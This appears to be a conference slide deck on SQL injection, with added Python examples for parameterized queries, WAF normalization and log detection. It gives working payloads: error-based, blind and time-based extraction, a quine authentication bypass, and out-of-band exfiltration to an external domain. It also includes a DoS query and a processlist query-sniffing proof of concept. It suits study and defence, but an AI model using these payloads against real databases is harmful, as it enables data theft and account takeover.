Look at Those Who Dismiss It as "Just Web Hacking"
2017.07.10
RUBIYA805[AT]GMAIL[DOT]COM
SQL Injection: The Threat That Isn't Over
Who am I
• Jeong Do-won (정도원) aka rubiya
• Penetration tester
• Web application bug hunter
• Pwned 20+ wargames
• @kr_rubiya
• Jobless
• How to find vulnerability?
• How to exploit vulnerability?
• Exploit more smartly
• MITM SQL Injection
What is SQL Injection
SELECT * FROM users WHERE name = '" + userName + "';
SELECT * FROM users WHERE name = 'FooBar';
SELECT * FROM users WHERE name = '1' OR '1'='1';
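Added example (not from the original slides): the concatenated query from the slide beside its parameterized form, run against a constructed in-memory SQLite table, so the 1' OR '1'='1 input can be seen matching every row in one and no rows in the other. The table, user names and passwords are made-up sample data.

```python
import sqlite3


def make_db():
    # Constructed sample table; nothing here comes from a real system.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("FooBar", "s3cret"), ("admin", "hunter2")])
    return conn


def find_user_vulnerable(conn, user_name):
    # String concatenation exactly as on the slide: the input becomes part of the SQL text,
    # so quote characters in it change the structure of the statement.
    sql = "SELECT * FROM users WHERE name = '" + user_name + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, user_name):
    # Parameterized query: the value travels separately from the SQL text and is never
    # parsed as SQL, so the same input is just a (non-existent) user name.
    sql = "SELECT * FROM users WHERE name = ?"
    return conn.execute(sql, (user_name,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print(find_user_vulnerable(conn, "FooBar"))        # one row
    print(find_user_vulnerable(conn, "1' OR '1'='1"))  # every row: WHERE name = '1' OR '1'='1'
    print(find_user_safe(conn, "1' OR '1'='1"))        # [] : no user is literally named that
```

The fix is not escaping the quote by hand; it is keeping data and SQL text in separate channels, which every mainstream driver supports through placeholders.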
Easy to access
NT Web Technology Vulnerabilities
But…
Why hard to prevent
How to find sqli vuln?
How about AEG?
How to find sqli vuln?
Indirect SQL Injection
Web Application Firewall
• An attack-blocking solution built to protect web applications
• Pattern-based firewall
• Pattern = ' or '1'='1
            ' and '1'='1
            ' || '1'='1
• ' or '2'='2 arrives and is not in the list, so ' or '2'='2 is added to the patterns
• Then ' or '3'='3 arrives, and the same thing happens again
Web Application Firewall
• In ASP, a % that is not followed by a value in the [00-FF] range is ignored
?id='UN%ION SE%LECT 1--;
↓
?id='UNION SELECT 1--;
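Added example (not from the original slides): a small Python model of the percent-handling the slide attributes to ASP, used as the normalization step a pattern-based WAF needs so that it inspects what the backend will actually execute rather than the raw bytes on the wire. The decoding rule is taken from the slide as stated and is an assumption here, not verified against a specific ASP version; the union/select signature is a constructed placeholder, not a real WAF rule.

```python
import re
from urllib.parse import unquote

# Assumption taken from the slide: a '%' that is not followed by two hex digits is dropped
# by the backend before the value is used.
_LONE_PERCENT = re.compile(r"%(?![0-9A-Fa-f]{2})")


def asp_style_decode(raw):
    """Decode a query value the way the slide says ASP does: drop lone '%', then percent-decode."""
    stripped = _LONE_PERCENT.sub("", raw)
    return unquote(stripped)


# Constructed, deliberately simple signature of the kind a pattern-based WAF might carry.
_UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE)


def flagged_by_naive_waf(raw):
    # Matches the bytes as they arrived: 'UN%ION' never contains the word 'union'.
    return bool(_UNION_SELECT.search(raw))


def flagged_by_normalizing_waf(raw):
    # Matches the value after applying the backend's own lenient decoding first.
    return bool(_UNION_SELECT.search(asp_style_decode(raw)))


if __name__ == "__main__":
    payload = "'UN%ION SE%LECT 1--"
    print(asp_style_decode(payload))
    print(flagged_by_naive_waf(payload), flagged_by_normalizing_waf(payload))
```

The general lesson is that a filter must canonicalize input with the same rules as the component it protects; any gap between the two decoders is where the pattern list stops mattering.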
SQL Injection + DDOS?
How to exploit vulnerability?
• Classic SQL Injection
• Blind SQL Injection
• Error Based SQL Injection
• Error Based Blind SQL Injection
• Time Based Blind SQL Injection
Error Based SQL Injection
• Possible when error messages are shown to the client
• Technique of getting the desired value included in the error message
• The attack method differs per DBMS
Error Based SQL Injection - MSSQL
Error Based SQL Injection - MySQL
• Duplicate entry
'||1 group by mid(version(),rand())having min(1)#
• XPATH syntax error
'|updatexml(0,concat(0xa,version()),0)#
• BIGINT value is out of range in
'--~(select*from(select@@version)f)#
Error Based Blind SQL Injection
• Used when the True/False result of the query cannot be observed
• Possible when an error is caught by the application's exception handling
ascii(substr((select pw from users),1,1))=97
select(select 96 union select
ascii(substr((select pw from users),1,1)))
two rows (96, 97) come back -> error (the subquery returns more than one row)
select(select 97 union select
ascii(substr((select pw from users),1,1)))
only 97 comes back -> no error
Time Based Blind SQL Injection
• MySQL
sleep(), benchmark()
• MSSQL
waitfor delay, waitfor time
• Oracle
dbms_lock.sleep()
Compounded SQL Injection
• SQLi + XSS
• SQLi + Authentication Bypass
• Out Of Band SQLi
SQLi + XSS
• When INSERT or UPDATE is possible, chain into Stored XSS
• Browser 1-day attacks delivered through iframe tags were in fashion
INSERT INTO board(no,user,<script>evilcode</script>)
UPDATE board SET content=<script>evilcode</script>
SQLi + Authentication Bypass
• Union SQL Injection
• Authentication bypass via recursive return values
Union SQL Injection
• Object Injection
• SSRF
• XML External Entity
• LFI / RFI
Authentication bypass via recursive return values
s = 's = %r\nprint(s%%s)'
print(s%s)
SELECT REPLACE(REPLACE('SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine',CHAR(34),CHAR(39)),CHAR(36),'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine') AS Quine
if(queryResult)
    if(queryResult == input)
        loginSuccess()
?id=asd' union select 1,'admin',REPLACE(@v:='asd\' union select 1,\'admin\',REPLACE(@v:=\'2\',1+1,REPLACE(REPLACE(@v,\'\\\\\',\'\\\\\\\\\'),\'\\\'\',\'\\\\\\\'\'))--',1+1,REPLACE(REPLACE(@v,'\\','\\\\'),'\'','\\\''))--
Out Of Band SQLi
• Sending packets to an external server
• Accessing files on the internal network
• DoS against the SQL server
• DNS Query
UTL_HTTP.REQUEST('http://'||(select…)||'.mydomain');
• Access SMB file
load_file('\\\\192.168.0.101\\aa');
DoS against the DBMS
• BENCHMARK()
• Heavy Query
• CVE-2015-4870
CVE-2015-4870
select * from information_schema.tables
procedure analyse((select*from(select 1)x),1);
Lord of SQL Injection
Exploit more smartly
• Bitwise operation Blind SQL Injection
• UPDATE, INSERT Blind SQL Injection without modify data
• MITM SQL Injection
Drawbacks of Blind SQL Injection
• Slow
• Leaves a lot of logs
Bitwise operation Blind SQL Injection
ascii(substr((select pw from users),1,1))=97
substr(
  lpad(
    bin(
      ascii(substr((select pw from users),1,1))
    )
  ,8,0)
,1,1) = 1
Evaluated step by step when the first byte is 97:
substr(lpad(bin(97),8,0),1,1) = 1
substr(lpad(1100001,8,0),1,1) = 1
substr(01100001,1,1) = 1
Seven bits are enough for an ASCII byte, so one request per bit looks like:
substr(lpad(bin(
ascii(substr((select pw from users),1,1))
),7,0),1,1)
MITM SQL Injection
• Information_schema.processlist.info
Sniff Query?
• Sign-up
insert into users values("guest123",md5("mypass666"))
• Login
select...where id='guest123' and pw=md5('mypass666')
But…
• If sniffing directly is too slow, make the DBMS do it!
• BENCHMARK(count,expr)
• @var_name = expr
SELECT benchmark(9999999,
@query:=concat(
@query,(select info from information_schema.processlist)
)
)
Issues
• When the same value is queried repeatedly the query result is cached, and with only SELECT privilege the cache cannot be turned off
• A query seen once is captured countless times
Proof of Concept
SELECT @query:=0x3a3a UNION SELECT @tmp:=0x20 UNION SELECT benchmark(500000,(@tmp:= (SELECT Group_concat(info) FROM information_schema.processlist WHERE info NOT LIKE 0x254d49544d5f53514c495f50574e25 or sleep(0)/*MITM_SQLI_PWN*/))^(IF((@tmp!=0x00)&&(@query NOT LIKE concat(0x253a3a,replace(@tmp,0x0a,0x5c5c6e),0x3a3a25)), @query:=concat(@query,replace(@tmp,0x0a,0x5c6e),0x3a3a),0))) UNION SELECT @query limit 3,1
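Added example (not from the original slides), serving the "leaves a lot of logs" drawback, the bitwise probes, the time-based functions and the processlist-based PoC above: a Python scan over constructed web-server access-log lines that URL-decodes each request target, counts per-client hits on indicator strings taken from these slides, and flags a client either by probe volume or by any attempt to read information_schema.processlist. Hosts, paths, timestamps and the log format are made up for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log lines in a simplified Apache combined layout. The payload shapes
# follow the slides; the addresses, paths and timestamps are invented.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jul/2017:10:00:01 +0900] "GET /board.php?id=12 HTTP/1.1" 200 512
10.0.0.9 - - [10/Jul/2017:10:00:02 +0900] "GET /board.php?id=1%27+and+substr(lpad(bin(ascii(substr((select+pw+from+users),1,1))),7,0),1,1)=1--+ HTTP/1.1" 200 511
10.0.0.9 - - [10/Jul/2017:10:00:02 +0900] "GET /board.php?id=1%27+and+substr(lpad(bin(ascii(substr((select+pw+from+users),1,1))),7,0),2,1)=1--+ HTTP/1.1" 200 511
10.0.0.9 - - [10/Jul/2017:10:00:03 +0900] "GET /board.php?id=1%27+and+substr(lpad(bin(ascii(substr((select+pw+from+users),1,1))),7,0),3,1)=1--+ HTTP/1.1" 200 511
10.0.0.5 - - [10/Jul/2017:10:00:04 +0900] "GET /board.php?id=13 HTTP/1.1" 200 498
10.0.0.7 - - [10/Jul/2017:10:00:05 +0900] "GET /board.php?id=1+union+select+benchmark(9999999,@q:=concat(@q,(select+info+from+information_schema.processlist))) HTTP/1.1" 200 600
10.0.0.5 - - [10/Jul/2017:10:00:06 +0900] "GET /board.php?id=1%27+and+sleep(5)--+ HTTP/1.1" 200 500
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)

# Substrings from the techniques on the slides, compared after URL-decoding and lower-casing.
INDICATORS = {
    "ascii(substr(": "blind (byte comparison)",
    "lpad(bin(": "blind (bitwise)",
    "sleep(": "time-based blind",
    "benchmark(": "time-based blind / DoS",
    "information_schema.processlist": "query sniffing (MITM SQLi)",
}

MITM = INDICATORS["information_schema.processlist"]


def parse_line(line):
    """Return (client ip, decoded lower-cased request target) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), unquote_plus(m.group("target")).lower()


def classify(target):
    """List the indicator descriptions present in one decoded request target."""
    return [desc for needle, desc in INDICATORS.items() if needle in target]


def scan(log_text):
    """Per client: (number of requests carrying an indicator, sorted list of techniques seen)."""
    hits = defaultdict(int)
    techs = defaultdict(set)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, target = parsed
        found = classify(target)
        if found:
            hits[ip] += 1
            techs[ip].update(found)
    return {ip: (n, sorted(techs[ip])) for ip, n in hits.items()}


def suspicious(log_text, threshold=3):
    """Flag a client on a single processlist read, or on probe volume at/above threshold."""
    out = []
    for ip, (n, techs) in sorted(scan(log_text).items()):
        if MITM in techs:
            out.append((ip, "processlist read attempt"))
        elif n >= threshold:
            out.append((ip, f"{n} blind-probe requests"))
    return out


if __name__ == "__main__":
    for ip, reason in suspicious(SAMPLE_LOG):
        print(ip, reason)
```

The volume rule is what makes bit-by-bit and byte-by-byte extraction visible: every bit costs one logged request, which is the "leaves a lot of logs" drawback in practice. The processlist rule is kept separate because a single such request is already worth an alert; on MySQL, the practical mitigation is to make sure the application account does not hold the PROCESS privilege, which is what lets one session see other users' running statements.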
Thank You [email protected]